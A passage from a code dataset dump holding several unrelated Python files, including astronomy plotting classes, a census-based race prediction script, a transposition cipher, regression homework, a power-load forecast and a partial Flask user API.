self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the residuals table\n try :\n self.detectedlines.readTableColumn(1, 'xpos_rectified')\n self.x_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos_rectified')\n self.y_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'xpos_rectified_iter')\n self.x_pix_iter = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos_rectified_iter')\n self.y_pix_iter = self.detectedlines.column\n except KeyError:\n self.detectedlines.readTableColumn(1, 'xpos')\n self.x_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos')\n self.y_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'xpos_iter')\n self.x_pix_iter = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos_iter')\n self.y_pix_iter = self.detectedlines.column\n\n \n self.detectedlines.readTableColumn(1, 'wave_ident')\n self.wave = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'wave_ident_iter')\n self.wave_iter = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'res_xpos')\n self.res_xpos = self.detectedlines.column\n\n def plotXVsY(self, subplot, title, tooltip):\n #We first plot all the detected lines\n self.xydisplay.setLabels('Xpos [pix]','Ypos [pix]')\n self.xydisplay.setColor('black')\n self.xydisplay.display(subplot, title, tooltip, self.x_pix,\n self.y_pix)\n #We then overplot the identified lines in the second iteration\n self.xydisplay.setColor('lightgreen')\n self.xydisplay.display(subplot, title, tooltip,\n self.x_pix_iter[numpy.isfinite(self.wave_iter)],\n self.y_pix_iter[numpy.isfinite(self.wave_iter)])\n #And then we overplot the identified lines in the first iteration\n self.xydisplay.setColor('green')\n self.xydisplay.display(subplot, title, tooltip, \n self.x_pix[numpy.isfinite(self.wave)],\n self.y_pix[numpy.isfinite(self.wave)])\n\n def plotResVsWave(self, subplot, title, tooltip, excluded_lines = None):\n self.resdisplay.setLabels('Wavelength [Ang]','Residual [pix]')\n self.resdisplay.setColor('black')\n self.resdisplay.display(subplot, title, tooltip, \n self.wave[numpy.isfinite(self.res_xpos)],\n self.res_xpos[numpy.isfinite(self.res_xpos)])\n if excluded_lines is not None :\n for line in excluded_lines : \n subplot.axvline(line, linestyle='solid',color='red')\n\n\nclass PlotableSkylinesOffsets :\n def __init__(self, fits_skylines_off):\n self.skylines_off = PipelineProduct(fits_skylines_off)\n self.resdisplay = ScatterDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the slylines offset table\n nslits = self.skylines_off.getTableNcols(1) - 1\n\n skylines_wave = self.skylines_off.readTableColumn(1, 'wave')\n self.allskylines_wave = list()\n self.allwave_res = list()\n \n for col in range(nslits) :\n self.allskylines_wave.extend(skylines_wave)\n wave_res = self.skylines_off.readTableColumn(1, col + 1)\n self.allwave_res.extend(wave_res)\n \n def plot(self, subplot, title, tooltip):\n self.resdisplay.setLabels('Wavelength [Ang]','Residual [Ang]')\n self.resdisplay.setColor('black')\n self.resdisplay.setPointSize(7)\n self.resdisplay.display(subplot, title, tooltip, \n self.allskylines_wave, self.allwave_res)\n\n\nclass PlotableExtractedScience :\n def __init__(self, fits_extractedscience):\n self.obj_id = -1\n self.extractedscience = PipelineProduct(fits_extractedscience)\n self.spectrumdisplay = SpectrumDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the flat image\n self.extractedscience.readImage()\n self.nobj = self.extractedscience.image.shape[0]\n self.crpix1 = self.extractedscience.readKeyword('CRPIX1', 0)\n self.crval1 = self.extractedscience.readKeyword('CRVAL1', 0)\n self.cdelt1 = self.extractedscience.readKeyword('CD1_1', 0)\n self.bunit = self.extractedscience.readKeyword('BUNIT', 0)\n self.nwave = self.extractedscience.image.shape[1]\n self.wave = numpy.arange(1, self.nwave+1, 1)\n self.wave = (self.wave - self.crpix1) * self.cdelt1 + self.crval1\n if(self.obj_id == -1) : # Select brightest\n self.selectBrightest()\n self.setFluxSelected()\n\n def selectBrightest(self):\n if self.nobj == 1:\n self.obj_id = 1\n median = 0\n for obj in range(self.nobj) :\n new_median = numpy.median(self.extractedscience.image[obj,:]) \n if new_median > median :\n median = new_median\n self.obj_id = obj + 1\n \n def setFluxSelected(self) :\n self.flux = self.extractedscience.image[self.obj_id-1,:]\n\n def selectObject(self, obj_id):\n self.obj_id = obj_id\n self.setFluxSelected()\n\n def plot(self, subplot, title, tooltip):\n\n self.spectrumdisplay.setLabels('Lambda', 'Total Flux ['+self.bunit+']')\n self.spectrumdisplay.display(subplot, title, tooltip, self.wave, self.flux,\n autolimits = True)\n\nclass PlotableSpecPhot :\n def __init__(self, fits):\n self.resp = PipelineProduct(fits)\n self.respdisp = SpectrumDisplay()\n self.tabdisp = ScatterDisplay()\n self.flat_sed = False\n self.loadFromFits()\n\n def loadFromFits(self) :\n self.wave = self.resp.readTableColumn(1, 'WAVE')\n self.wave_obs = self.resp.readTableColumn(2, 'WAVE')\n self.std_ref_flux = self.resp.readTableColumn(1, 'STD_FLUX')\n self.std_obs_flux = self.resp.readTableColumn(1, 'OBS_FLUX')\n if 'RESPONSE' in self.resp.all_hdu[2].columns.names :\n self.fit_response = self.resp.readTableColumn(2, 'RESPONSE')\n self.raw_response = self.resp.readTableColumn(1, 'RAW_RESPONSE')\n else :\n self.fit_response = self.resp.readTableColumn(2, 'RESPONSE_FFSED')\n self.raw_response = self.resp.readTableColumn(1, 'RAW_RESPONSE_FFSED')\n self.flat_sed = True\n self.used_fit = self.resp.readTableColumn(1, 'USED_FIT')\n self.raw_response_nonnull = self.raw_response[self.raw_response > 0]\n self.wave_nonnull = self.wave[self.raw_response > 0]\n self.wave_used = self.wave[self.used_fit > 0]\n self.raw_response_used = self.raw_response[self.used_fit > 0] \n\n def plotResponse(self, subplot, title, tooltip):\n self.respdisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) e-)')\n self.respdisp.flux_lim = 0., numpy.max(self.raw_response_nonnull) * 1.1\n self.respdisp.display(subplot, title, tooltip, self.wave_obs, self.fit_response, autolimits = False)\n subplot.scatter(self.wave_nonnull, self.raw_response_nonnull, color='darkblue')\n subplot.scatter(self.wave_used, self.raw_response_used, color='lightgreen')\n\n def plotStdExtracted(self, subplot, title, tooltip):\n self.respdisp.setLabels('Angstrom','e-/ (s Angstrom)')\n std_obs_flux_nonnull = self.std_obs_flux[self.std_obs_flux > 0]\n wave_nonnull = self.wave[self.std_obs_flux > 0]\n self.respdisp.display(subplot, title, tooltip,\n wave_nonnull, std_obs_flux_nonnull, autolimits = True)\n\n def plotStdTabulated(self, subplot, title, tooltip):\n self.tabdisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) e-)')\n self.tabdisp.display(subplot, title, tooltip, self.wave, self.std_ref_flux)\n\nclass PlotableStdTabRedFlux :\n def __init__(self, reducedfluxstd_fits, reducedstd_fits, specphot_fits):\n self.reducedfluxstd = PlotableExtractedScience(reducedfluxstd_fits)\n self.reducedstd = PlotableExtractedScience(reducedstd_fits)\n self.specphot = PlotableSpecPhot(specphot_fits)\n self.tabstddisp = ScatterDisplay()\n self.stdreddisp = ScatterDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #This will select the brightest spectrum, which is the criteria\n #used to extract the standard star\n self.reducedfluxstd.loadFromFits()\n self.reducedstd.loadFromFits()\n self.specphot.loadFromFits()\n self.std_ref_flux_nonnull = self.specphot.std_ref_flux[self.specphot.raw_response > 0]\n self.std_ref_flux_used = self.specphot.std_ref_flux[self.specphot.used_fit > 0]\n \n\n def plotStdTabRedFlux(self, subplot, title, tooltip) :\n self.tabstddisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) Angstrom)')\n self.tabstddisp.setLimits(self.reducedfluxstd.wave[0],\n self.reducedfluxstd.wave[len(self.reducedfluxstd.wave)-1],\n 0.,\n numpy.max(self.reducedfluxstd.flux) * 1.1)\n self.tabstddisp.setColor('red') \n self.tabstddisp.display(subplot, title, tooltip, \n self.reducedfluxstd.wave, self.reducedfluxstd.flux)\n self.tabstddisp.setColor('darkblue') \n self.tabstddisp.setPointSize(20) \n subplot.scatter(self.specphot.wave, self.specphot.std_ref_flux)\n subplot.scatter(self.specphot.wave_used, self.std_ref_flux_used, color='lightgreen')\n\n\n def plotStdRed(self, subplot, title, tooltip) :\n self.stdreddisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) Angstrom)')\n self.stdreddisp.setLimits(self.reducedstd.wave[0],\n self.reducedstd.wave[len(self.reducedstd.wave)-1],\n 0.,\n numpy.max(self.reducedstd.flux) * 1.1) \n self.stdreddisp.setColor('red') \n self.stdreddisp.display(subplot, title, tooltip, \n self.reducedstd.wave, self.reducedstd.flux)\n\n\n\n","sub_path":"forspy/fors_plot_common.py","file_name":"fors_plot_common.py","file_ext":"py","file_size_in_byte":18930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"403038318","text":"import os\nimport sys\nimport joblib\nimport datetime\nimport requests\nimport numpy as np\nimport pandas as pd\nimport censusgeocode as cg\n\nos.environ['R_HOME'] = '/Library/Frameworks/R.framework/Resources'\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects.packages import importr\n\ncensus_key = os.getenv('CENSUS_KEY')\n\npd.set_option('max_columns', 1000)\npd.set_option('max_info_columns', 1000)\npd.set_option('expand_frame_repr', False)\npd.set_option('display.max_rows', 30000)\npd.set_option('max_colwidth', 4000)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\n\ndef feature_create(df):\n df['age'] = (pd.datetime.today() - pd.to_datetime(df['birth_date'])).dt.days / 365.25\n df['sex'] = df['gender'].apply(lambda x: 0 if x == 'Male' else 1) # coded as 0 for Male and 1 for Female because that is the definition used in wru.predict_race\n return df\n\ndef _geocode_batch(df):\n df[['street_address', 'city', 'postal_abbreviation', 'code']].dropna().to_csv('/Users/travis.howe/Downloads/test_address2.csv', header=False, index=True)\n return pd.DataFrame(cg.addressbatch('/Users/travis.howe/Downloads/test_address2.csv', returntype='geographies')) # I have to send in a .csv file\n\ndef predict_prep(df):\n df['id'] = df.index\n census_vars = ['id', 'countyfp', 'tract', 'block']\n obs_vars = ['id', 'last_name', 'age', 'sex', 'postal_abbreviation']\n\n df_census = _geocode_batch(df)[census_vars]\n df_census['id'] = df_census['id'].astype(int)\n\n return df[obs_vars].merge(df_census, how='outer', on='id', indicator=True).\\\n drop(['id', '_merge'], 1).\\\n rename(columns={'last_name': 'surname', 'postal_abbreviation': 'state', 'countyfp': 'county'})\n\ndef race_predict(df):\n # todo: why are there missing counties?\n df = df.query('(county != \"None\") and (county == county)')\n df.set_index([[1]], inplace=True)\n\n r = robjects.r\n pandas2ri.activate()\n wru = importr('wru') # https://github.com/kosukeimai/wru\n\n # df.loc[3, 'surname'] = 'Althaus'\n\n # df.dropna(inplace=True)\n df['age'] = df['age'].apply(lambda x: round(x))\n\n census_data = joblib.load('data_files/census_data_all_states_county.pkl')\n X_out = wru.predict_race(voter_file=df, census_geo='county', census_key=census_key, sex=True, age=True, census_data=census_data)\n print(pandas2ri.ri2py(X_out))\n\n census_data = joblib.load('data_files/census_data_all_states_tract.pkl')\n X_out = wru.predict_race(voter_file=df, census_geo='tract', census_key=census_key, sex=True, age=True, census_data=census_data)\n print(pandas2ri.ri2py(X_out))\n\n# todo: block?\n\ndef _convert_to_pandas(r_lst, level):\n r = robjects.r\n l = r.length(r_lst)\n print(l)\n\n df = pd.DataFrame()\n for region in range(l): # includes \"DC\" in addition to the fifty states\n print(r_lst[region][0])\n print(r_lst[region][1])\n print(r_lst[region][2])\n print(r_lst[region][3])\n df = df.append(pandas2ri.ri2py(r_lst[region][3]))\n return df\n\n\ndef download_census_data(level):\n r = robjects.r\n pandas2ri.activate()\n wru = importr('wru')\n\n states = [\"AL\", \"AK\", \"AZ\", \"AR\", \"CA\", \"CO\", \"CT\", \"DC\", \"DE\", \"FL\", \"GA\",\n \"HI\", \"ID\", \"IL\", \"IN\", \"IA\", \"KS\", \"KY\", \"LA\", \"ME\", \"MD\",\n \"MA\", \"MI\", \"MN\", \"MS\", \"MO\", \"MT\", \"NE\", \"NV\", \"NH\", \"NJ\",\n \"NM\", \"NY\", \"NC\", \"ND\", \"OH\", \"OK\", \"OR\", \"PA\", \"RI\", \"SC\",\n \"SD\", \"TN\", \"TX\", \"UT\", \"VT\", \"VA\", \"WA\", \"WV\", \"WI\", \"WY\"]\n\n X_out = wru.get_census_data(census_key, states, age=True, sex=True, census_geo=level)\n\n joblib.dump(X_out, 'census_data_all_states_{}.pkl'.format(level))\n joblib.dump(_convert_to_pandas(X_out, level), 'census_data_all_states_{}_pd.pkl'.format(level))\n\n\ndef main():\n\n # joblib.dump(_convert_to_pandas(joblib.load('census_data_all_states_county.pkl'), 'county'), 'census_data_all_states_{}_pd.pkl'.format(level))\n # sys.exit()\n\n # download_census_data('county')\n download_census_data('tract')\n download_census_data('block')\n\n\n\nif __name__ == '__main__':\n # main()\n # sys.exit()\n\n #example\n # pd.DataFrame([['Howe', '809 Logan Ave', 'Belton', 'MO', '64012', 35, 0]], columns=['last_name', 'street_address', 'city', 'postal_abbreviation', 'code', 'age', 'sex']). \\\n pd.DataFrame([['Young', '6700 W 138th Ter', 'Overland Park', 'KS', '66223', 26, 0]], columns=['last_name', 'street_address', 'city', 'postal_abbreviation', 'code', 'age', 'sex']). \\\n pipe(predict_prep). \\\n pipe(race_predict)\n\n\n\n# todo: download the census data so don't have to query the website whenever I want to generate a prediction\n# todo: there is likely a better way to county data from address...look into this.\n\n# todo: Althaus Jr; changing it to Althaus solved the problem.\n# todo: some people don't have ages, gender\n# todo: age can't be decimal\n# todo: does census_geo='tract', census_geo='block' give a different answer\n# todo: what to do if a person doesn't get a race estimate\n\n# todo: is there anything I can do to increase the number of matches---about 89% of observations have a match\n\n","sub_path":"coding/R/rpy2/wru/wru.py","file_name":"wru.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"124294577","text":"#ROW TRANSPOSITION\nimport numpy as np\n\nstr=input(\"Enter the string : \")\nkey=int(input(\"Enter the key\"))\nl=[]\nprint(\"enter the priority order :\")\n\nfor i in range(key):\n l.append(int(input()))\n\nr=l\nt=[]\nfor i in str:\n t.append(i)\n \nif(len(t)!=key*key and len(t)<=key*key):\n for i in range((key**2)-len(t)):\n t.append('X')\nelif(len(t)>key*key):\n print(\"INVALID INPUT\")\n\na=np.array(t)\nma=a.reshape(key,key)\nprint(\"MATRIX FORMED IS :\\n\",ma)\n\nprint(\"\\nORDER IS : \")\nfor i in l:\n print(i,end=\" \")\n\nci=\"\" \ntemp=len(l)\np=[]\np=p+l\nfor i in range(temp):\n f=min(p)\n for j in range(temp):\n ci=ci+ma[j][l.index(f)]\n p.remove(f)\n \nprint(\"\\nCipher Text : \",ci)\n","sub_path":"coltrans.py","file_name":"coltrans.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479411754","text":"import numpy as np\nimport scipy as sp\nimport math\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import linear_model\nfrom numpy import linalg as LA\nfrom numpy import genfromtxt\n\n# import the data from the .csv file to a 100x4 array. Randomize its order\ndata = genfromtxt('HW03/D3.csv', delimiter=',')\n#print data\nrandomData = np.array(data)\nnp.random.shuffle(randomData)\n\n# Select training data of size 70 (first 70 rows in randomized dataset).\nq1TrainArray = randomData[0:70, [0,1,2,3]]\n# Select testing data of size 30 (following rest of the 30 rows in randomized dataset)\nq1TestArray = randomData[70:100, [0,1,2,3]]\nprint (\"==================================================================\")\n\ndef runAlgo():\n print (\"Length of training data: \" , len(q1TrainArray))\n print (\"Length of testing data : \" , len(q1TestArray))\n # Make xTrain[x1,x2,x3], yTrain[column4]\n xTrain = q1TrainArray[:, [0,1,2]]\n yTrain = q1TrainArray[:, [3]]\n\n # Make xTest[x1,x2,x3], yTest[column4]\n xTest = q1TestArray[:, [0,1,2]]\n yTest = q1TestArray[:, [3]]\n\n # solve for a line l which minimizes the SSE(P,l). This line equation is the model. \n # Build the model from the training data.\n clf = linear_model.LinearRegression()\n clfFit = clf.fit(xTrain, yTrain)\n coefficents = clfFit.coef_[0]\n coefficents = np.array(coefficents)\n\n # Predicts the value of y using the found Model for the tuple of x values (x1,x2,x3, ...)\n # y = a0 + a1x1+ a2x2 + ...\n def predictY(xTuple):\n return (clfFit.intercept_ + (coefficents[0] * xTuple[0]) + (coefficents[1] * xTuple[1]) + (coefficents[2] * xTuple[2]))\n\n # Finds the SSE\n def sse():\n sumE = 0\n for i in range(0,len(xTest)):\n yHat = predictY(xTest[i])[0]\n #print (yHat)\n r = (yTest[i] - yHat)**2\n #print(\"r:\" , r)\n sumE = sumE + r\n return sumE\n\n # Predict y for (1,1,1), (2,0,4), (3,2,1)\n y1 = predictY([1,1,1])\n y2 = predictY([2,0,4])\n y3 = predictY([3,2,1]) \n\n print (\"Coefficients [a1, ..., an]: \", clfFit.coef_[0])\n print (\"Intercept (a0) : \", clfFit.intercept_)\n print (\"SSE : \", sse())\n print (\"x = (1,1,1), yPredict = \", y1)\n print (\"x = (2,0,4), yPredict = \", y2)\n print (\"x = (3,2,1), yPredict = \", y3)\n print (\"==================================================================\")\n \nrunAlgo()\n\n# Select training vs testing data (90,10)\nq1TrainArray = randomData[0:90, [0,1,2,3]]\nq1TestArray = randomData[90:100, [0,1,2,3]]\nrunAlgo()\n\n# Select training vs testing data (67,33)\nq1TrainArray = randomData[0:67, [0,1,2,3]]\nq1TestArray = randomData[67:100, [0,1,2,3]]\nrunAlgo()\n\n# Select training vs testing data (80,20)\nq1TrainArray = randomData[0:80, [0,1,2,3]]\nq1TestArray = randomData[80:100, [0,1,2,3]]\nrunAlgo()\n","sub_path":"Linear Regression/multiVarLinearRegression.py","file_name":"multiVarLinearRegression.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653660255","text":"\r\nimport pickle\r\nfrom MLModelFunctions import *\r\nimport matplotlib.pyplot as plt\r\nfrom ControlParameters import *\r\n\r\n\r\nXLABEL = 'Time Recording Length'\r\n\r\n# loading da pickle\r\ninfile = open(\"allStatsDataPickle\", 'rb')\r\nstatsDict = pickle.load(infile)\r\nprint(\"stats loaded\")\r\n\r\nxlabel = 'Time recording length'\r\nnplot = 0\r\n# For each state: stand, walkFL, walkFR\r\nfor state in statsDict:\r\n\r\n # Label for title\r\n stateLabel = state.split(\"CSVData\")[0]\r\n\r\n # x-axis time samples\r\n time_records = []\r\n\r\n # collect value of each\r\n dic_Prec = {}\r\n dic_Recall = {}\r\n dic_F1 = {}\r\n dic_Sup = {}\r\n list_Accuracy = []\r\n # each time sample\r\n for filename in statsDict[state]:\r\n sr, tr = splitControlsfromName(filename)\r\n time_records.append(int(tr))\r\n \r\n jsonResult = statsDict[state][filename]\r\n \r\n for intentkey in jsonResult:\r\n # if intentkey == 'accuracy':\r\n # list_Accuracy.append(jsonResult[intentkey]['accuracy'])\r\n \r\n # check for numbers (intention)\r\n try:\r\n int(intentkey)\r\n except ValueError:\r\n continue\r\n\r\n # Accumulate per intent <- new value in list of time samples \r\n try:\r\n dic_Prec[intentkey] += [jsonResult[intentkey]['precision']]\r\n except KeyError:\r\n dic_Prec[intentkey] = [jsonResult[intentkey]['precision']]\r\n \r\n try:\r\n dic_Recall[intentkey] += [jsonResult[intentkey]['recall']]\r\n except KeyError:\r\n dic_Recall[intentkey] = [jsonResult[intentkey]['recall']]\r\n \r\n try:\r\n dic_F1[intentkey] += [jsonResult[intentkey]['f1-score']]\r\n except KeyError:\r\n dic_F1[intentkey] = [jsonResult[intentkey]['f1-score']]\r\n \r\n try:\r\n dic_Sup[intentkey] += [jsonResult[intentkey]['support']]\r\n except KeyError:\r\n dic_Sup[intentkey] = [jsonResult[intentkey]['support']]\r\n \r\n # -- All metrics across stationary state done\r\n ## Plot accuracy\r\n # plt.figure(nplot)\r\n # time_plot, pltPrec = zipsort(time_records, list_Accuracy)\r\n # plt.plot(time_plot, list_Accuracy)\r\n # plt.title(stateLabel + \" Accuracy Plot\")\r\n # plt.xlabel(XLABEL)\r\n # plt.ylabel(\"Accuracy\")\r\n # plt.legend()\r\n # plt.show()\r\n # nplot += 1\r\n \r\n \r\n \r\n ## Plot Precision\r\n plt.figure(nplot)\r\n for intent in dic_Prec:\r\n time_plot, pltPrec = zipsort(time_records, dic_Prec[intent])\r\n plt.plot(time_plot, pltPrec, label=ALLSTATES_DIC[int(intent)])\r\n \r\n plt.title(stateLabel + \" Precision Plot\")\r\n plt.xlabel(XLABEL)\r\n plt.ylabel(\"Precision\")\r\n plt.legend()\r\n plt.show()\r\n nplot +=1\r\n \r\n \r\n \r\n ## Plot Recall\r\n plt.figure(nplot)\r\n for intent in dic_Recall:\r\n time_plot, pltRecall = zipsort(time_records, dic_Recall[intent])\r\n plt.plot(time_plot, pltRecall, label=ALLSTATES_DIC[int(intent)])\r\n \r\n plt.title(stateLabel + \" Recall Plot\")\r\n plt.xlabel(XLABEL)\r\n plt.ylabel(\"Recall\")\r\n plt.legend()\r\n plt.show()\r\n nplot += 1\r\n \r\n \r\n \r\n ## Plot F1-Score\r\n plt.figure(nplot)\r\n for intent in dic_Recall:\r\n time_plot, pltF1 = zipsort(time_records, dic_F1[intent])\r\n plt.plot(time_plot, pltF1, label=ALLSTATES_DIC[int(intent)])\r\n \r\n plt.title(stateLabel + \" F1_Score Plot\")\r\n plt.xlabel(XLABEL)\r\n plt.ylabel(\"F1_Score\")\r\n plt.legend()\r\n plt.show()\r\n nplot += 1\r\n \r\n \r\n \r\n ## Plot Support?\r\n","sub_path":"AutomationPipeline/TimeIntent/MLEvaluation.py","file_name":"MLEvaluation.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"5551297","text":"import os\nimport subprocess\n\nimport os_bridge\n\n\ndef upline(lines):\n return subprocess.check_output(['tput', 'cuu', '%s' % lines])\n\n\n_eraseline = None\n\n\ndef eraseline():\n global _eraseline\n if not _eraseline:\n _eraseline = subprocess.check_output(['tput', 'el'])\n return _eraseline\n\n\ndef set_cursor_visible(visible):\n if visible:\n subprocess.call(['tput', 'cnorm'])\n else:\n subprocess.call(['tput', 'civis'])\n\n\ndef set_line_wrap_enabled(enabled):\n subprocess.call(['tput', ('smam' if enabled else 'rmam')])\n\n\ndef progress_bar(current, max):\n if current >= max:\n return green('[' + '=' * max + ']')\n elif current <= 0:\n return green('[') + yellow('-') * max + green(']')\n else:\n return green('[' + '=' * (current - 1) + '>') + yellow(\n '-' * (max - current)) + green(']')\n\n\ndef terminal_rows():\n return int(subprocess.check_output(['tput', 'lines']))\n\n\ndef terminal_columns():\n return int(subprocess.check_output(['tput', 'cols']))\n\n\ndef tail_file(file):\n try:\n FNULL = open(os.devnull, 'wb')\n return \"%s--> %s\" % (\n eraseline(),\n subprocess.check_output(['tail', '-n', '1', file], stderr=FNULL).rstrip()\n )\n except subprocess.CalledProcessError:\n return \"[No output]\"\n\n\n# unscrupulously ripped from fabric's colors.py\n\ndef _wrap_with(code):\n def inner(text, bold=False):\n if not os_bridge.is_terminal_colorable():\n return text\n c = code\n\n if bold:\n c = \"1;%s\" % c\n return \"\\033[%sm%s\\033[0m\" % (c, text)\n\n return inner\n\n\nred = _wrap_with('31')\ngreen = _wrap_with('32')\nyellow = _wrap_with('33')\nblue = _wrap_with('34')\nmagenta = _wrap_with('35')\ncyan = _wrap_with('36')\nwhite = _wrap_with('37')\n","sub_path":"sanic/console_formatting.py","file_name":"console_formatting.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"366610872","text":"#import packages\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import Timestamp\r\n\r\n\r\n#read the file\r\ndf = pd.read_csv('台灣電力公司_過去電力供需資訊.csv')\r\ntemp_sub = {'date': [],'peak_load(MW)':[]}\r\nsub_df = pd.DataFrame(data=temp_sub)\r\n\r\n#setting index as date\r\ndf['日期'] = pd.to_datetime(df.日期,format='%Y%m%d')\r\ndf.index = df['日期']\r\n\r\n#creating dataframe with date and the target variable\r\ndata = df.sort_index(ascending=True, axis=0)\r\nnew_data = pd.DataFrame(index=range(0,len(df)),columns=['日期', '尖峰負載(MW)'])\r\n\r\nfor i in range(0,len(data)):\r\n new_data['日期'][i] = data['日期'][i]\r\n new_data['尖峰負載(MW)'][i] = data['尖峰負載(MW)'][i]\r\n\r\n#train\r\ntrain = new_data[:]\r\n\r\nnew_data.shape, train.shape\r\n((424, 2), (424, 2))\r\n\r\ntrain['日期'].min(), train['日期'].max()\r\n\r\n(Timestamp('2018-01-24 00:00:00'),\r\nTimestamp('2019-02-28 00:00:00'))\r\n\r\n#make predictions by using moving average\r\npreds = []\r\nfor i in range(0,7):\r\n a = train['尖峰負載(MW)'][len(train)-7+i:].sum() + sum(preds)\r\n b = a/7\r\n preds.append(b)\r\n sub_df=sub_df.append({'date': '2019040'+str(i+2),'peak_load(MW)':b}, ignore_index=True)\r\n\r\n\r\n\r\n#output\r\nsub_df.set_index('date' , inplace=True)\r\nsub_df.to_csv('submission.csv')\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"122152126","text":"# have to run this with python3\n\nimport sys\n\nprint (f\"sys.argv = {sys.argv}\")\n\nfilename = sys.argv[1]\nprint (f\"filename = {filename}\")\n\noutfile = sys.argv[2]\nprint (f\"outfile = {outfile}\")\n\nletters = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n\n# make it to dictionary for faster searching\nletters_dict = {}\nfor l in letters:\n\tletters_dict[l] = l\nletters = letters_dict\n\ndef sentence_start(data, i):\n\tif not data[i] in letters:\n\t\treturn False\n\n\tif i == 0:\n\t\treturn True\n\n\tj = i - 1\n\n\t# have to be a new line\n\tif data[j] != '\\n':\n\t\treturn False\n\n\twhile j >= 0:\n\t\tif data[j] != ' ' and data[j] != '\\t' and data[j] != '\\n' and data[j] != '\\r' and data[j] != '(' and data[j] != \"'\" and data[j] != '\"' and data[j] != ')':\n\t\t\tbreak\n\t\tj -= 1\n\n\tif j < 0:\n\t\treturn True\n\n\tif data[j] == '.' or data[j] == '?' or data[j] == '!':\n\t\treturn True\n\n\tif data[j] == '-' and j > 8:\n\t\tall_dash = True\n\t\tfor k in range(j-8, j):\n\t\t\tif data[k] != '-':\n\t\t\t\tall_dash = False\n\t\t\t\tbreak\n\t\tif all_dash == True:\n\t\t\treturn True\n\n\treturn False\n\nwith open(filename, 'r') as myfile:\n\tdata = myfile.read()\n\tdata2 = str(data)\n\tprint (f\"flen(data) = {len(data)}\")\n\tfor i in range(len(data)):\n\t\tif sentence_start(data, i):\n\t\t\tdata2 = data2[:i] + data[i].upper() + data[i+1:]\n\nassert (len(data2) == len(data))\nwith open(outfile, 'w') as f:\n\tf.write(data2)\n\tprint (f\"data is written to {outfile}\")\n","sub_path":"z_others/mk_1st_letter_cap/make_1st_letter_capital_v2.py","file_name":"make_1st_letter_capital_v2.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"50974033","text":"from django.db import models\r\nfrom tools.base import CategoryModel\r\n\r\nclass TipoMaterial(CategoryModel):\r\n \"\"\"\r\n Describe los tipos de materiales utilizables en las máquinas\r\n \"\"\"\r\n\r\n unidad = models.CharField(\r\n max_length=16,\r\n null=True,\r\n blank=True,\r\n help_text=('indica la unidad con la que debería medirse el material.'\r\n 'ej. \"g\", \"cm^2\"')\r\n )\r\n\r\n class Meta:\r\n verbose_name = 'material'\r\n verbose_name_plural = 'materiales'","sub_path":"trabajos/models/tipos.py","file_name":"tipos.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"459300285","text":"'''\n defines behavior for each api address\n'''\nimport ast\nfrom flask import request, make_response, jsonify, abort\nfrom server import app\nfrom server.models import db, User, Post, Option, Vote\nimport sqlalchemy.exc\nimport json\n\ndb.create_all()\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': error.description}), 404)\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n return make_response(jsonify({'error': error.description}), 400)\n\n\n@app.errorhandler(409)\ndef already_exists(error):\n return make_response(jsonify({'error': error.description}), 409)\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n return make_response(jsonify({'error': 'internal server error'}), 500)\n\n\n@app.route('/users/', methods=['GET'])\ndef get_user(uuid):\n response = {}\n user = User.query.filter_by(uuid=uuid).first()\n if user:\n response['user'] = user.uid\n else:\n # return jsonify({'test':'test'}), 200\n abort(404, 'user with id %s not found' % uuid)\n return jsonify(response)\n\n\n@app.route('/users', methods=['POST'])\ndef create_user():\n response = {}\n uuid = request.form.get('uuid')\n if uuid is None:\n abort(404, 'no uuid entered')\n else:\n user = User(uuid)\n try:\n db.session.add(user)\n db.session.commit()\n response['message'] = 'created'\n except sqlalchemy.exc.IntegrityError:\n abort(409, 'uuid already exists')\n except:\n abort(500, 'Internal server error')\n return jsonify(response)\n\n\n@app.route('/users//posts', methods=['GET'])\ndef 